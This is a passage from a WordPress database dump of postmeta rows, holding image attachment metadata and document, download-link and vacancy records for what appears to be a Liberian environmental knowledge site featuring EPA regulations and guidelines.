:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-600x746.png\";s:5:\"width\";i:600;s:6:\"height\";i:746;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:137041;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:147072;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-27-at-16.46.50-1102x640.png\";s:5:\"width\";i:1102;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:314280;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39363,5917,'_last_editor_used_jetpack','classic-editor'),(39364,5917,'_edit_lock','1779958230:38'),(39365,5918,'_wp_attached_file','2026/05/Screenshot-2026-05-27-at-17.03.27.png'),(39366,5918,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1198;s:6:\"height\";i:1444;s:4:\"file\";s:45:\"2026/05/Screenshot-2026-05-27-at-17.03.27.png\";s:8:\"filesize\";i:524843;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-249x300.png\";s:5:\"width\";i:249;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30805;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-27-at-17.03.27-850x1024.png\";s:5:\"width\";i:850;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:250670;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12397;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-768x926.png\";s:5:\"width\";i:768;s:6:\"height\";i:926;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:212895;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52071;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-05-27-at-17.03.27-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9968;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26245;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69093;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:74681;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116073;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-27-at-17.03.27-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:365838;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-05-27-at-17.03.27-1198x1080.png\";s:5:\"width\";i:1198;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:415869;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-600x723.png\";s:5:\"width\";i:600;s:6:\"height\";i:723;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:141177;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-17.03.27-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:153360;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-27-at-17.03.27-1198x640.png\";s:5:\"width\";i:1198;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:378947;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39367,5919,'_wp_attached_file','2026/05/NOISE_POLLUTION_AND_CONTROL_REGULATION_FINAL-2025-EPA.pdf-11.pdf'),(39368,5919,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:450230;}'),(39369,5917,'_edit_last','38'),(39370,5917,'_wp_page_template','default'),(39371,5917,'download_link','https://ekmsliberia.info/wp-content/uploads/2026/05/NOISE_POLLUTION_AND_CONTROL_REGULATION_FINAL-2025-EPA.pdf-11.pdf'),(39372,5917,'by','EPA'),(39373,5917,'year','2025'),(39374,5917,'_pods_document_cover_image','a:1:{i:0;i:5918;}'),(39414,5917,'document_cover_image','5918'),(39376,5917,'_pods_attached_document','a:1:{i:0;i:5919;}'),(39415,5917,'attached_document','5919'),(39378,5921,'_last_editor_used_jetpack','classic-editor'),(39379,5921,'_edit_lock','1779958149:38'),(39380,5921,'_edit_last','38'),(39381,5922,'_wp_attached_file','2026/05/Screenshot-2026-05-28-at-08.27.28.png'),(39382,5922,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1202;s:6:\"height\";i:1492;s:4:\"file\";s:45:\"2026/05/Screenshot-2026-05-28-at-08.27.28.png\";s:8:\"filesize\";i:321423;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-242x300.png\";s:5:\"width\";i:242;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28003;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-28-at-08.27.28-825x1024.png\";s:5:\"width\";i:825;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:188458;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12538;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-768x953.png\";s:5:\"width\";i:768;s:6:\"height\";i:953;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:170612;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32433;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-05-28-at-08.27.28-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6256;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25299;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:61596;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:63700;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75255;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-28-at-08.27.28-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:120302;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-05-28-at-08.27.28-1202x1080.png\";s:5:\"width\";i:1202;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:232232;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-600x745.png\";s:5:\"width\";i:600;s:6:\"height\";i:745;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117066;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.27.28-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:126929;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-28-at-08.27.28-1202x640.png\";s:5:\"width\";i:1202;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91371;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39383,5923,'_wp_attached_file','2026/05/Guideline-and-Policy-Access-Environmental-Information-EPA-Final-2.pdf'),(39384,5923,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:707516;}'),(39385,5921,'_wp_page_template','default'),(39386,5921,'download_link','https://ekmsliberia.info/wp-content/uploads/2026/05/Guideline-and-Policy-Access-Environmental-Information-EPA-Final-2.pdf'),(39387,5921,'by','EPA'),(39388,5921,'year','March 25, 2025'),(39389,5921,'_pods_document_cover_image','a:1:{i:0;i:5922;}'),(39412,5921,'document_cover_image','5922'),(39391,5921,'_pods_attached_document','a:1:{i:0;i:5923;}'),(39413,5921,'attached_document','5923'),(39393,5925,'_last_editor_used_jetpack','classic-editor'),(39394,5925,'_edit_lock','1779957933:38'),(39395,5925,'_edit_last','38'),(39396,5926,'_wp_attached_file','2026/05/Screenshot-2026-05-28-at-08.38.22.png'),(39397,5926,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1008;s:6:\"height\";i:1300;s:4:\"file\";s:45:\"2026/05/Screenshot-2026-05-28-at-08.38.22.png\";s:8:\"filesize\";i:167061;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-233x300.png\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19792;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-28-at-08.38.22-794x1024.png\";s:5:\"width\";i:794;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:118045;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8255;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-768x990.png\";s:5:\"width\";i:768;s:6:\"height\";i:990;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112399;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19809;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-05-28-at-08.38.22-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4854;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16411;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37294;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39792;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35417;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-28-at-08.38.22-1008x650.png\";s:5:\"width\";i:1008;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59799;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-05-28-at-08.38.22-1008x1080.png\";s:5:\"width\";i:1008;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:124289;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-600x774.png\";s:5:\"width\";i:600;s:6:\"height\";i:774;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:78773;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-28-at-08.38.22-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:72585;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-28-at-08.38.22-1008x640.png\";s:5:\"width\";i:1008;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59715;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39398,5927,'_wp_attached_file','2026/05/LPG-GUIDELINES-EPA-Final-2.pdf'),(39399,5927,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:479539;}'),(39400,5925,'_wp_page_template','default'),(39401,5925,'download_link','https://ekmsliberia.info/wp-content/uploads/2026/05/LPG-GUIDELINES-EPA-Final-2.pdf'),(39402,5925,'by','EPA'),(39403,5925,'year','March 25, 2025'),(39404,5925,'_pods_document_cover_image','a:1:{i:0;i:5926;}'),(39410,5925,'document_cover_image','5926'),(39406,5925,'_pods_attached_document','a:1:{i:0;i:5927;}'),(39411,5925,'attached_document','5927'),(39418,5930,'_edit_lock','1780166266:38'),(39419,5930,'_last_editor_used_jetpack','block-editor'),(39420,5931,'_wp_attached_file','2026/05/today-now.jpeg'),(39421,5931,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:22:\"2026/05/today-now.jpeg\";s:8:\"filesize\";i:140062;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"today-now-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15758;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"today-now-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115547;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"today-now-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6792;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"today-now-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72655;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"today-now-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22047;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"today-now-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4125;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"today-now-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13253;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"today-now-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31864;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"today-now-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37769;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"today-now-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47085;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:23:\"today-now-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104052;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"today-now-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48468;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"today-now-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68839;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:23:\"today-now-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97302;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39424,5930,'_thumbnail_id','5931'),(39428,5930,'kava_extra_enable_breadcrumbs','inherit'),(39429,5930,'post_formats',''),(39430,5930,'gallery_tab',''),(39431,5930,'kava_extra_gallery_images',''),(39432,5930,'link_tab',''),(39433,5930,'kava_extra_link',''),(39434,5930,'kava_extra_link_target','_blank'),(39435,5930,'quote_tab',''),(39436,5930,'kava_extra_quote_text',''),(39437,5930,'kava_extra_quote_cite',''),(39438,5930,'audio_tab',''),(39439,5930,'kava_extra_audio',''),(39440,5930,'kava_extra_audio_loop','false'),(39441,5930,'kava_extra_audio_autoplay','false'),(39442,5930,'kava_extra_audio_preload','false'),(39443,5930,'video_tab',''),(39444,5930,'kava_extra_video_type','library'),(39445,5930,'kava_extra_video_library',''),(39446,5930,'kava_extra_video_external',''),(39447,5930,'kava_extra_video_poster',''),(39448,5930,'kava_extra_video_width','770'),(39449,5930,'kava_extra_video_height','480'),(39450,5930,'kava_extra_video_loop','false'),(39451,5930,'kava_extra_video_autoplay','false'),(39452,5930,'kava_extra_video_preload','false'),(39455,5935,'_last_editor_used_jetpack','classic-editor'),(39456,5935,'_edit_lock','1781025927:38'),(39457,5935,'_edit_last','38'),(39458,5935,'_wp_page_template','default'),(39459,5935,'closed_date','2026-06-22'),(39460,5935,'owner','SCNL, EPA'),(39461,5935,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_KMCS.pdf'),(39462,5937,'_wp_attached_file','2026/06/Final_TOR_KMCS.pdf'),(39463,5937,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:296607;}'),(39464,5939,'_last_editor_used_jetpack','classic-editor'),(39465,5939,'_edit_lock','1781025563:38'),(39466,5939,'_edit_last','38'),(39467,5939,'_wp_page_template','default'),(39468,5939,'closed_date','2026-06-22'),(39469,5939,'owner','SCNL, EPA'),(39470,5939,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_POM.pdf'),(39471,5941,'_wp_attached_file','2026/06/Final_TOR_POM.pdf'),(39472,5941,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:252906;}'),(39473,5945,'_edit_lock','1781026319:38'),(39474,5945,'_last_editor_used_jetpack','block-editor'),(39475,5946,'_wp_attached_file','2026/06/719160126_1505325871636667_850325227837403501_n.jpg'),(39476,5946,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1440;s:6:\"height\";i:1080;s:4:\"file\";s:59:\"2026/06/719160126_1505325871636667_850325227837403501_n.jpg\";s:8:\"filesize\";i:306244;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21990;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"719160126_1505325871636667_850325227837403501_n-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:200749;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8033;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120613;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30834;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:58:\"719160126_1505325871636667_850325227837403501_n-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5325;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17179;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46590;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53535;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74976;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:60:\"719160126_1505325871636667_850325227837403501_n-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185543;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78282;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:59:\"719160126_1505325871636667_850325227837403501_n-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110906;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:60:\"719160126_1505325871636667_850325227837403501_n-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184690;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39480,5945,'_edit_last','38'),(39479,5945,'_thumbnail_id','5946'),(39508,5948,'_wp_attached_file','2026/06/718014503_1505325968303324_8087690081882678858_n.jpg'),(39483,5945,'kava_extra_enable_breadcrumbs','inherit'),(39484,5945,'post_formats',''),(39485,5945,'gallery_tab',''),(39486,5945,'kava_extra_gallery_images',''),(39487,5945,'link_tab',''),(39488,5945,'kava_extra_link',''),(39489,5945,'kava_extra_link_target','_blank'),(39490,5945,'quote_tab',''),(39491,5945,'kava_extra_quote_text',''),(39492,5945,'kava_extra_quote_cite',''),(39493,5945,'audio_tab',''),(39494,5945,'kava_extra_audio',''),(39495,5945,'kava_extra_audio_loop','false'),(39496,5945,'kava_extra_audio_autoplay','false'),(39497,5945,'kava_extra_audio_preload','false'),(39498,5945,'video_tab',''),(39499,5945,'kava_extra_video_type','library'),(39500,5945,'kava_extra_v